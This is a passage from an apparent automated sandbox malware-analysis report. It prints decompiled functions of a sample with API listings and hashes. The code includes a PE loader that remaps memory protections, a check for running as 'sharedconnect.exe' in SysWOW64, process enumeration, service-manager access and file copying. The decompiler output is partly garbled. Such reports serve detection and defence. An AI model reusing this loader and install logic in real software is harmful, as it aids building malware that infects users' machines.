				_t162 = _v84;
				_t188 =  *((intOrPtr*)(_t162 + 0x3c));
				_v108 = _t162 + _t188;
				_v112 = _v84 + 0x3c;
				_v116 = 0x18;
				if(_t188 + 0xffffffc0 <= 0xfc0) {
					_t159 = _v108;
					_t132 =  ==  ? _t159 + 0x18 : 0x18;
					_v116 =  ==  ? _t159 + 0x18 : 0x18;
				}
				_v120 = _v116;
				if(_v100 == 0) {
					L4:
					_v132 =  *_v104;
					_v136 = 0;
					do {
						_t107 = _v136;
						 *((char*)(_v132 + _t107)) =  *((intOrPtr*)(_v84 + _t107));
						_t108 = _t107 + 1;
						_v136 = _t108;
					} while (_t108 != 0x400);
					_t110 =  ==  ? _v84 +  *_v112 : 0;
					 *((intOrPtr*)(( ==  ? _v84 +  *_v112 : 0) + 0x34)) =  *_v104;
					_t113 = VirtualProtect(_v84, 0x400, 2,  &_v76); // executed
					_t181 = _v80;
					_v40 =  *((intOrPtr*)(_t181 + 0x60));
					_v36 =  *((intOrPtr*)(_t181 + 0x64));
					_v32 =  *((intOrPtr*)(_t181 + 0x68));
					_v28 =  *((intOrPtr*)(_t181 + 0x5c));
					_v24 =  *((intOrPtr*)(_t181 + 0x58));
					_v20 = _v84 +  *((intOrPtr*)(_t181 + 0x38));
					 *((intOrPtr*)(_t203 - 0xc)) = _t181;
					_v176 = 0;
					_v172 = 0x6c;
					_v140 = _t113;
					_v144 = 0;
					_v148 = 0x6c;
					E007F104C();
					_t203 =  *((intOrPtr*)( &_v40 + 0x10));
					goto __eax;
				} else {
					_t176 =  ==  ? _v108 : 0;
					_v124 = ( *(( ==  ? _v108 : 0) + 0x14) & 0x0000ffff) + _v120;
					_v128 = 0;
					while(1) {
						_t153 = _v124;
						_t183 =  *(_t153 + 0x24);
						_v152 = _v128;
						_v156 = _t183 >> 0x0000001e & 0x00000001;
						_v160 = _t183 >> 0x1f;
						_v164 = _t153;
						_t129 = VirtualProtect(_v84 +  *((intOrPtr*)(_t153 + 0xc)),  *(_t153 + 8),  *( &_v72 + (_v156 << 4) + (_v160 << 3) + ((_t183 >> 0x0000001d & 0x00000001) << 2)),  &_v76); // executed
						_t155 = _v152 + 1;
						_v168 = _t129;
						_v124 = _v164 + 0x28;
						_v128 = _t155;
						if(_t155 == _v100) {
							goto L4;
						}
					}
					goto L4;
				}
			}

0x007f263d
0x007f2646
0x007f2653
0x007f265a
0x007f2661
0x007f266a
0x007f266d
0x007f2673
0x007f2676
0x007f267c
0x007f2680
0x007f2683
0x007f2686
0x007f2689
0x007f268c
0x007f268f
0x007f26a0
0x007f26a5
0x007f26b3
0x007f26b6
0x007f26c4
0x007f26c7
0x007f26ca
0x007f26cd
0x007f26d4
0x007f26e2
0x007f26e5
0x007f26e5
0x007f26f1
0x007f26f4
0x007f271c
0x007f2723
0x007f2726
0x007f272c
0x007f272c
0x007f273b
0x007f273e
0x007f2746
0x007f2746
0x007f2769
0x007f276c
0x007f277e
0x007f278a
0x007f2793
0x007f2799
0x007f279f
0x007f27a5
0x007f27ab
0x007f27ae
0x007f27b4
0x007f27b7
0x007f27bf
0x007f27c7
0x007f27cd
0x007f27d3
0x007f27d9
0x007f27ef
0x007f27f5
0x007f26f6
0x007f2705
0x007f2711
0x007f2714
0x007f2802
0x007f2805
0x007f2811
0x007f2817
0x007f2825
0x007f2836
0x007f2862
0x007f2868
0x007f2870
0x007f2881
0x007f2887
0x007f288a
0x007f288d
0x00000000
0x00000000
0x007f2893
0x00000000
0x007f2802

APIs

Part of subcall function 007F23BE: VirtualAlloc.KERNELBASE(00000000,00010000,00001000,00000040), ref: 007F23F6

VirtualProtect.KERNELBASE(?,00000400,00000002,00000000), ref: 007F277E
VirtualProtect.KERNELBASE(?,?,00000001,00000000), ref: 007F2868

Strings

l, xrefs: 007F27BF

Memory Dump Source

Source File: 00000005.00000002.403400241.00000000007F0000.00000040.00000001.sdmp, Offset: 007F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7f0000_tcpmdmaus.jbxd

Similarity

API ID: Virtual$Protect$Alloc
String ID: l
API String ID: 2541858876-2517025534
Opcode ID: 00d8471c64c758433526c76c87caa4425811ca5b38e83ce80f0b2d02b5b17b24
Instruction ID: 7b7ddcaccccf827084afeb3625295e7c2da44d575c96c63f5ab7557d00f58be4
Opcode Fuzzy Hash: 00d8471c64c758433526c76c87caa4425811ca5b38e83ce80f0b2d02b5b17b24
Instruction Fuzzy Hash: 2881F4B4E002188FDB14CFA8C980A9DBBF1FF88304F6581A9D909AB346D775AD45CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00CD8060, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 29%

			E00CD8060() {
				int _t5;
				WCHAR* _t12;
				void* _t14;

				GetTempPathW();
				_t5 = GetTempFileNameW(_t14 - 0x208, _t12, _t12, _t14 - 0x208);
				if(L00CD1340(_t5, 0xcdaab0, _t14 - 0x208) != 0) {
					goto 0xe31abf;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int 0xe8");
					_t12 = _t6; // executed
				}
				L00CD13A0(_t6); // executed
				return _t12;
			}

0x00cd8060
0x00cd8070
0x00cd8088
0x00cd808a
0x00cd808f
0x00cd8090
0x00cd8091
0x00cd8093
0x00cd8099
0x00cd8099
0x00cd809b
0x00cd80a6

APIs

GetTempPathW.KERNEL32 ref: 00CD8060
GetTempFileNameW.KERNEL32(?,?,?,?), ref: 00CD8070

Strings

C:\Windows\SysWOW64\sharedconnect.exe, xrefs: 00CD807C

Memory Dump Source

Source File: 00000005.00000002.403460556.0000000000CD1000.00000020.00000001.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000005.00000002.403454733.0000000000CD0000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.403468745.0000000000CD9000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.403475669.0000000000CDA000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cd0000_tcpmdmaus.jbxd

Yara matches

Similarity

API ID: Temp$FileNamePath
String ID: C:\Windows\SysWOW64\sharedconnect.exe
API String ID: 3285503233-3666525999
Opcode ID: ca806fd0d7dc9aa277d5e0a0719067f878c661fe5b0b3053668ef5dbba56a13f
Instruction ID: 25c475c72c19416b62765ed94276e6d3bc23cf959d8715fde0fef10de48627d4
Opcode Fuzzy Hash: ca806fd0d7dc9aa277d5e0a0719067f878c661fe5b0b3053668ef5dbba56a13f
Instruction Fuzzy Hash: F3D0127060113957CA1066B19C0C6EB7B6CDB44291B040297BE19C2611DD208944DBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00CD7B40, Relevance: 4.5, APIs: 3, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_() {
				int _t3;
				void* _t4;
				void* _t6;
				void* _t7;
				void* _t8;
				void* _t9;
				void* _t10;

				L00CD7800();
				L00CD7870(); // executed
				_t3 = L00CD1030(); // executed
				if(_t3 != 0) {
					_t4 = L00CD1100(); // executed
					_t12 = _t4;
					if(_t4 != 0) {
						E00CD74D0(_t6, _t7, _t8, _t9, _t10, _t12); // executed
					}
					ExitProcess(0);
				}
				ExitProcess(_t3); // executed
			}

0x00cd7b40
0x00cd7b45
0x00cd7b4a
0x00cd7b51
0x00cd7b5a
0x00cd7b5f
0x00cd7b61
0x00cd7b63
0x00cd7b63
0x00cd7b6a
0x00cd7b6a
0x00cd7b54

APIs

ExitProcess.KERNEL32 ref: 00CD7B54
ExitProcess.KERNEL32 ref: 00CD7B6A

Memory Dump Source

Source File: 00000005.00000002.403460556.0000000000CD1000.00000020.00000001.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000005.00000002.403454733.0000000000CD0000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.403468745.0000000000CD9000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.403475669.0000000000CDA000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cd0000_tcpmdmaus.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 60b931d6b97a37f6c55d9d7eee1462d4c3a62e078e1d4597eefaf3bd6368000c
Instruction ID: bde5096e0c7ab6e5c41e9f08f133fe1db1a9510aef13b9de52aae3edc3499e78
Opcode Fuzzy Hash: 60b931d6b97a37f6c55d9d7eee1462d4c3a62e078e1d4597eefaf3bd6368000c
Instruction Fuzzy Hash: 39D0EA2064928166EA1137B15E0E71E2AA89F153C6F454213BB52A53A2FE389500B526

Uniqueness

Uniqueness Score: -1.00%

Function 00CD74D0, Relevance: 3.1, APIs: 2, Instructions: 60
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E00CD74D0(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* __ebp;
				void* _t2;
				int _t4;
				void* _t5;
				void* _t7;
				void* _t8;
				void* _t9;
				void* _t10;
				void* _t15;
				long _t17;
				void* _t20;
				void* _t22;
				void* _t23;
				void* _t30;

				_t30 = __eflags;
				_t24 = __esi;
				_t23 = __edi;
				_t22 = __edx;
				_t20 = __ecx;
				L00CD70F0(); // executed
				_t2 = E00CD72E0(_t30);
				if(_t2 != 0) {
					if(L00CD6C30(_t2) == 0) {
						L17:
						_t4 = FindCloseChangeNotification( *0xcda82c); // executed
						return _t4;
					}
					_t5 = L00CD6DC0(_t3); // executed
					if(_t5 == 0 || L00CD6E30(_t5) == 0) {
						goto L17;
					} else {
						_t7 = L00CD6EA0(_t6); // executed
						if(_t7 == 0) {
							goto L17;
						}
						_t8 = L00CD6F10(_t7); // executed
						if(_t8 == 0) {
							goto L17;
						}
						_t9 = L00CD6F80(_t8); // executed
						if(_t9 == 0) {
							goto L17;
						}
						_t10 = L00CD7050(_t9); // executed
						if(_t10 == 0) {
							goto L17;
						}
						if(E00CD82D0(__ebx, _t22, __esi) != 0 || E00CD6990(_t20) == 0) {
							L16:
							E00CD70D0();
							goto L17;
						} else {
							_push(_t20);
							_t21 = L00CD84F0(_t13);
							_t15 = E00CD8780(_t14);
							_t41 = _t15;
							if(_t15 == 0) {
								L15:
								L00CD69E0(_t15);
								goto L16;
							}
							do {
								_t17 = L00CD7370(_t41);
							} while (_t17 == 0 || WaitForSingleObject( *0xcda82c, _t17) == 0x102);
							_t15 = E00CD88B0(_t18, _t21, _t23, _t24);
							goto L15;
						}
					}
				}
				return _t2;
			}

0x00cd74d0
0x00cd74d0
0x00cd74d0
0x00cd74d0
0x00cd74d0
0x00cd74d6
0x00cd74db
0x00cd74e2
0x00cd74ef
0x00cd758c
0x00cd7592
0x00000000
0x00cd7592
0x00cd74f5
0x00cd74fc
0x00000000
0x00cd750f
0x00cd750f
0x00cd7516
0x00000000
0x00000000
0x00cd7518
0x00cd751f
0x00000000
0x00000000
0x00cd7521
0x00cd7528
0x00000000
0x00000000
0x00cd752a
0x00cd7531
0x00000000
0x00000000
0x00cd753a
0x00cd7587
0x00cd7587
0x00000000
0x00cd754b
0x00cd754b
0x00cd7551
0x00cd7553
0x00cd755b
0x00cd755d
0x00cd7582
0x00cd7582
0x00000000
0x00cd7582
0x00cd7560
0x00cd7560
0x00cd7565
0x00cd757d
0x00000000
0x00cd757d
0x00cd753a
0x00cd74fc
0x00cd759b

APIs

Part of subcall function 00CD72E0: WaitForSingleObject.KERNEL32(00000000,?,00CD74E0,?,00CD7B68), ref: 00CD72F3
Part of subcall function 00CD72E0: SignalObjectAndWait.KERNEL32(000000FF,00000000,?,00CD74E0,?,00CD7B68), ref: 00CD7326
Part of subcall function 00CD72E0: ResetEvent.KERNEL32(?,00CD74E0,?,00CD7B68), ref: 00CD733D
Part of subcall function 00CD72E0: ReleaseMutex.KERNEL32(?,00CD74E0,?,00CD7B68), ref: 00CD734B
Part of subcall function 00CD72E0: CloseHandle.KERNEL32(?,00CD74E0,?,00CD7B68), ref: 00CD7357

FindCloseChangeNotification.KERNELBASE(?,00CD7B68), ref: 00CD7592

Part of subcall function 00CD82D0: lstrcmpiW.KERNEL32(00CDAFC8,C:\Windows\SysWOW64\sharedconnect.exe,?,00CD7538,?,00CD7B68), ref: 00CD82FE

WaitForSingleObject.KERNEL32(00000000), ref: 00CD7570

Memory Dump Source

Source File: 00000005.00000002.403460556.0000000000CD1000.00000020.00000001.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000005.00000002.403454733.0000000000CD0000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.403468745.0000000000CD9000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.403475669.0000000000CDA000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cd0000_tcpmdmaus.jbxd

Yara matches

Similarity

API ID: ObjectWait$CloseSingle$ChangeEventFindHandleMutexNotificationReleaseResetSignallstrcmpi
String ID:
API String ID: 603632274-0
Opcode ID: 281059227238487fb4a44e65a7ac265b933b5a75b8d52c2cfddf4a1458619f62
Instruction ID: f2e57e9c07bd99cc8427e192773f4b34b6d5a855ed4165a6dafb00685d469db7
Opcode Fuzzy Hash: 281059227238487fb4a44e65a7ac265b933b5a75b8d52c2cfddf4a1458619f62
Instruction Fuzzy Hash: E601A5A561820602EA2033F57E0672EA2998E40385B480767FF25C1793FE31DA14F477

Uniqueness

Uniqueness Score: -1.00%

Function 00CD82D0, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 23
stringCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00CD82D0(void* __ebx, void* __edx, void* __esi) {
				void* __ecx;
				intOrPtr _t1;
				void* _t3;
				void* _t4;
				int _t7;
				void* _t14;
				void* _t16;
				void* _t17;

				_t17 = __esi;
				_t16 = __edx;
				_t1 =  *0xcda830; // 0xaf72bc4a
				 *0xcda844 = _t1;
				L00CD7BA0();
				_t3 = L00CD7B80(); // executed
				_t4 = L00CD7D00(_t3, __ebx, _t14); // executed
				L00CD7E10(L00CD7D80(_t4));
				_t7 = lstrcmpiW(0xcdafc8, "C:\Windows\SysWOW64\sharedconnect.exe");
				if(_t7 != 0) {
					L00CD8030(_t14, _t16, _t17); // executed
					if( *0xcda840 == 0) {
						goto 0xe31bb5;
						asm("int3");
						asm("int3");
						asm("int 0xe8");
						L00CD1E60(_t17);
						return 1;
					} else {
						L00CD8130(); // executed
						return 1;
					}
				} else {
					return _t7; // executed
				}
			}

0x00cd82d0
0x00cd82d0
0x00cd82d1
0x00cd82d6
0x00cd82db
0x00cd82e0
0x00cd82e5
0x00cd82ef
0x00cd82fe
0x00cd8306
0x00cd830a
0x00cd8316
0x00cd8324
0x00cd8329
0x00cd832a
0x00cd832c
0x00cd832d
0x00cd833b
0x00cd8318
0x00cd8318
0x00cd8323
0x00cd8323
0x00cd8309
0x00cd8309
0x00cd8309

APIs

lstrcmpiW.KERNEL32(00CDAFC8,C:\Windows\SysWOW64\sharedconnect.exe,?,00CD7538,?,00CD7B68), ref: 00CD82FE

Strings

C:\Windows\SysWOW64\sharedconnect.exe, xrefs: 00CD82F4

Memory Dump Source

Source File: 00000005.00000002.403460556.0000000000CD1000.00000020.00000001.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000005.00000002.403454733.0000000000CD0000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.403468745.0000000000CD9000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.403475669.0000000000CDA000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cd0000_tcpmdmaus.jbxd

Yara matches

Similarity

API ID: lstrcmpi
String ID: C:\Windows\SysWOW64\sharedconnect.exe
API String ID: 1586166983-3666525999
Opcode ID: ecea6b12fb73ccedebec0471c4d999ca6242b3815d4edeb6b4a4cd9cdfa2091d
Instruction ID: 849a6568b21c2d720988bd5c00ade26bf1aec394b41ac7da6960f7eee454e8d1
Opcode Fuzzy Hash: ecea6b12fb73ccedebec0471c4d999ca6242b3815d4edeb6b4a4cd9cdfa2091d
Instruction Fuzzy Hash: 6CE0E67021A101ABC61477F4AC9671E33D16F40741F90075BF705857D2FE745455F513

Uniqueness

Uniqueness Score: -1.00%

Function 00CD134D, Relevance: 3.0, APIs: 2, Instructions: 22
COMMON

Download Yara Rule

C-Code - Quality: 45%

			E00CD134D(void* __eax, intOrPtr __ecx, intOrPtr __edx) {
				int _t11;
				intOrPtr _t14;
				intOrPtr _t16;
				void* _t18;

				_t14 = __edx;
				_t16 = __ecx;
				memset(__eax, 0, ??);
				 *((intOrPtr*)(_t18 - 0x1c)) = 1;
				 *((intOrPtr*)(_t18 - 0x18)) = _t16;
				 *((short*)(_t18 - 0x10)) = 0xe14;
				 *((intOrPtr*)(_t18 - 0x14)) = _t14;
				_t11 = SHFileOperationW(_t18 - 0x20); // executed
				if(_t11 != 0 ||  *((intOrPtr*)(_t18 - 0xe)) != _t11) {
					goto 0xe30194;
					return _t11;
				} else {
					goto 0xe3017e;
					asm("int3");
					asm("int3");
					asm("int3");
					return _t11;
				}
			}

0x00cd134d
0x00cd1352
0x00cd1354
0x00cd135d
0x00cd1369
0x00cd136c
0x00cd1373
0x00cd1377
0x00cd1381
0x00cd1391
0x00cd1396
0x00cd1388
0x00cd1388
0x00cd138d
0x00cd138e
0x00cd138f
0x00cd1390
0x00cd1390

APIs

memset.NTDLL ref: 00CD1354
SHFileOperationW.SHELL32(?), ref: 00CD1377

Memory Dump Source

Source File: 00000005.00000002.403460556.0000000000CD1000.00000020.00000001.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000005.00000002.403454733.0000000000CD0000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.403468745.0000000000CD9000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.403475669.0000000000CDA000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cd0000_tcpmdmaus.jbxd

Yara matches

Similarity

API ID: FileOperationmemset
String ID:
API String ID: 1721435463-0
Opcode ID: 5a0457ac4b974deffaac3d7d6bdff96e4b997b66344734c325dac9422036ca81
Instruction ID: 0b5f845de6f9dcdc38bcdc5f53bfac3f41200dff83180bd6d69b844950cf8683
Opcode Fuzzy Hash: 5a0457ac4b974deffaac3d7d6bdff96e4b997b66344734c325dac9422036ca81
Instruction Fuzzy Hash: 4CE01AB0D01219DBDB209BA5D8087FE7BB4EB88715F140027E910B2650D7758A41CB96

Uniqueness

Uniqueness Score: -1.00%

Function 00CD1B57, Relevance: 3.0, APIs: 2, Instructions: 11COMMON

Download Yara Rule

APIs

Process32FirstW.KERNEL32 ref: 00CD1B63
FindCloseChangeNotification.KERNELBASE ref: 00CD1B91

Memory Dump Source

Source File: 00000005.00000002.403460556.0000000000CD1000.00000020.00000001.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000005.00000002.403454733.0000000000CD0000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.403468745.0000000000CD9000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.403475669.0000000000CDA000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cd0000_tcpmdmaus.jbxd

Yara matches

Similarity

API ID: ChangeCloseFindFirstNotificationProcess32
String ID:
API String ID: 2932581522-0
Opcode ID: 1a51bd85856683995e6021443967e9a262d7bcc590d2c193bfacb091700aa041
Instruction ID: 8d49618378ab2c648a8416fd3e5bcd0a7126c8c55a7afabf861304b3667dee89
Opcode Fuzzy Hash: 1a51bd85856683995e6021443967e9a262d7bcc590d2c193bfacb091700aa041
Instruction Fuzzy Hash: 4BD01270002520FBD7549F60AC6CBBE7B3CEF01300F25808AE526A0090DB348B42CE66

Uniqueness

Uniqueness Score: -1.00%

Function 00CD7DAE, Relevance: 3.0, APIs: 2, Instructions: 10COMMON

Download Yara Rule

APIs

CreateFileMappingW.KERNELBASE ref: 00CD7DAE
CloseHandle.KERNEL32 ref: 00CD7DF8

Memory Dump Source

Source File: 00000005.00000002.403460556.0000000000CD1000.00000020.00000001.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000005.00000002.403454733.0000000000CD0000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.403468745.0000000000CD9000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.403475669.0000000000CDA000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cd0000_tcpmdmaus.jbxd

Yara matches

Similarity

API ID: CloseCreateFileHandleMapping
String ID:
API String ID: 3834335185-0
Opcode ID: bc05b90a4e21c7463476da5ef53893643e07be03d9c7354d0d7c72724c8b6a8e
Instruction ID: 0c1b6f622f29385a6b1cdc7987ccb36bb7a015b82d328991579ad46ae092b5a0
Opcode Fuzzy Hash: bc05b90a4e21c7463476da5ef53893643e07be03d9c7354d0d7c72724c8b6a8e
Instruction Fuzzy Hash: C1B09B36105511DB42051758741C3DDB776DFC43213174157E915D22149F30C5024552

Uniqueness

Uniqueness Score: -1.00%

Function 00CD1B86, Relevance: 3.0, APIs: 2, Instructions: 7COMMON

Download Yara Rule

APIs

Process32NextW.KERNEL32 ref: 00CD1B86
FindCloseChangeNotification.KERNELBASE ref: 00CD1B91

Memory Dump Source

Source File: 00000005.00000002.403460556.0000000000CD1000.00000020.00000001.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000005.00000002.403454733.0000000000CD0000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.403468745.0000000000CD9000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.403475669.0000000000CDA000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cd0000_tcpmdmaus.jbxd

Yara matches

Similarity

API ID: ChangeCloseFindNextNotificationProcess32
String ID:
API String ID: 2947032094-0
Opcode ID: 8168fd44dabda19e528936166a13ae7858f9961993064d683fe171005587d0ad
Instruction ID: 57e45f9fb2562b8bcef872af4d0bd796fad56956043cede6019aa261d957753f
Opcode Fuzzy Hash: 8168fd44dabda19e528936166a13ae7858f9961993064d683fe171005587d0ad
Instruction Fuzzy Hash: F7B09230203610B742206B60682CBAD2F289A123417142003E626A0020E714C601D556

Uniqueness

Uniqueness Score: -1.00%

Function 00CD7BA9, Relevance: 3.0, APIs: 2, Instructions: 7serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32 ref: 00CD7BA9
CloseServiceHandle.ADVAPI32(00000000), ref: 00CD7BBE

Memory Dump Source

Source File: 00000005.00000002.403460556.0000000000CD1000.00000020.00000001.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000005.00000002.403454733.0000000000CD0000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.403468745.0000000000CD9000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.403475669.0000000000CDA000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cd0000_tcpmdmaus.jbxd

Yara matches

Similarity

API ID: CloseHandleManagerOpenService
String ID:
API String ID: 1199824460-0
Opcode ID: 85fc1a53649ecd468216842025aa3d7dbb2c55a01960f70af2db3c868574f4c2
Instruction ID: 2a8aeced5e2cc593b8688d14c57370bbf850ae5de8f73f6f43c3f5bda75c0d06
Opcode Fuzzy Hash: 85fc1a53649ecd468216842025aa3d7dbb2c55a01960f70af2db3c868574f4c2
Instruction Fuzzy Hash: 50B092B0102100EFDF50AF31ED0CB4E3BA8B700305B0C838BF405C02A0DBB4C106CA62

Uniqueness

Uniqueness Score: -1.00%

Function 00CD18C0, Relevance: 3.0, APIs: 2, Instructions: 6
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00CD18C0(void* __ecx) {
				char _t2;

				_t2 = RtlFreeHeap(GetProcessHeap(), 0, __ecx); // executed
				return _t2;
			}

0x00cd18ca
0x00cd18d0

APIs

GetProcessHeap.KERNEL32(00000000,?,00CD10E3), ref: 00CD18C3
RtlFreeHeap.NTDLL(00000000), ref: 00CD18CA

Memory Dump Source

Source File: 00000005.00000002.403460556.0000000000CD1000.00000020.00000001.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000005.00000002.403454733.0000000000CD0000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.403468745.0000000000CD9000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.403475669.0000000000CDA000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cd0000_tcpmdmaus.jbxd

Yara matches

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 29ad406c7e6e0c21bf79c6c5fc5f84e199e44b0ed77d0ad32b57abe052109eb7
Instruction ID: 09ae309236a4a1f90b2c88cde76b970aba8887ddd3447fc4192744ea7ba7ca04
Opcode Fuzzy Hash: 29ad406c7e6e0c21bf79c6c5fc5f84e199e44b0ed77d0ad32b57abe052109eb7
Instruction Fuzzy Hash: 0FA001B1956700ABEE847BB0AE1EB1E3B38EB48702F068546B216851A09AA554008A22

Uniqueness

Uniqueness Score: -1.00%

Function 00CD1850, Relevance: 3.0, APIs: 2, Instructions: 6
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00CD1850(long __ecx) {
				void* _t2;

				_t2 = RtlAllocateHeap(GetProcessHeap(), 8, __ecx); // executed
				return _t2;
			}

0x00cd185a
0x00cd1860

APIs

GetProcessHeap.KERNEL32(00000008,-00000040,00CD107F), ref: 00CD1853
RtlAllocateHeap.NTDLL(00000000), ref: 00CD185A

Memory Dump Source

Source File: 00000005.00000002.403460556.0000000000CD1000.00000020.00000001.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000005.00000002.403454733.0000000000CD0000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.403468745.0000000000CD9000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.403475669.0000000000CDA000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cd0000_tcpmdmaus.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: 38f0085a743263d639833570d181fa9bc6a7e7c5f964d3dbf9c829a5ff60f418
Instruction ID: dd7245a6779b70982fadc85f7d2358f1f05e8f6fec05f28f7aa5370f77672f7a
Opcode Fuzzy Hash: 38f0085a743263d639833570d181fa9bc6a7e7c5f964d3dbf9c829a5ff60f418
Instruction Fuzzy Hash: 94A002B1551600AFEE4467F49D4DB1D3728E748701F058545715585150996554058722

Uniqueness

Uniqueness Score: -1.00%

Function 00CD7105, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

GetWindowsDirectoryW.KERNEL32 ref: 00CD7105

Memory Dump Source

Source File: 00000005.00000002.403460556.0000000000CD1000.00000020.00000001.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000005.00000002.403454733.0000000000CD0000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.403468745.0000000000CD9000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.403475669.0000000000CDA000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cd0000_tcpmdmaus.jbxd

Yara matches

Similarity

API ID: DirectoryWindows
String ID:
API String ID: 3619848164-0
Opcode ID: a457c83b34e33dce4cd256e28bcb267030c2462d54d91e1f3cc4f597a25626d3
Instruction ID: 19d400c5c1592ece688531171eb3c8ae28d0ba5b92c8348694789527d112faa9
Opcode Fuzzy Hash: a457c83b34e33dce4cd256e28bcb267030c2462d54d91e1f3cc4f597a25626d3
Instruction Fuzzy Hash: FED05B21D092088ACF315B40DC0A3797378E701300F0463CBC91D46360FBB18ED086D1

Uniqueness

Uniqueness Score: -1.00%

Function 00CD12F4, Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE ref: 00CD12F4

Memory Dump Source

Source File: 00000005.00000002.403460556.0000000000CD1000.00000020.00000001.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000005.00000002.403454733.0000000000CD0000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.403468745.0000000000CD9000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.403475669.0000000000CDA000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cd0000_tcpmdmaus.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 7a349be77045cbeeb71fef25cfb6b4057bca3e24798f07550cfd3eea1578f211
Instruction ID: 90b3516dd920d9bdf0135f395f4d4fd9affd1d9d689e61f9ccd66fefb5aeeb38
Opcode Fuzzy Hash: 7a349be77045cbeeb71fef25cfb6b4057bca3e24798f07550cfd3eea1578f211
Instruction Fuzzy Hash: 6AC08C1040B340D99A6083A8805C2B62AA8AA11338F782B0BCEB7A05F083B08980E103

Uniqueness

Uniqueness Score: -1.00%

Function 00CD713C, Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

GetVolumeInformationW.KERNELBASE(?), ref: 00CD714B

Memory Dump Source

Source File: 00000005.00000002.403460556.0000000000CD1000.00000020.00000001.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000005.00000002.403454733.0000000000CD0000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.403468745.0000000000CD9000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.403475669.0000000000CDA000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cd0000_tcpmdmaus.jbxd

Yara matches

Similarity

API ID: InformationVolume
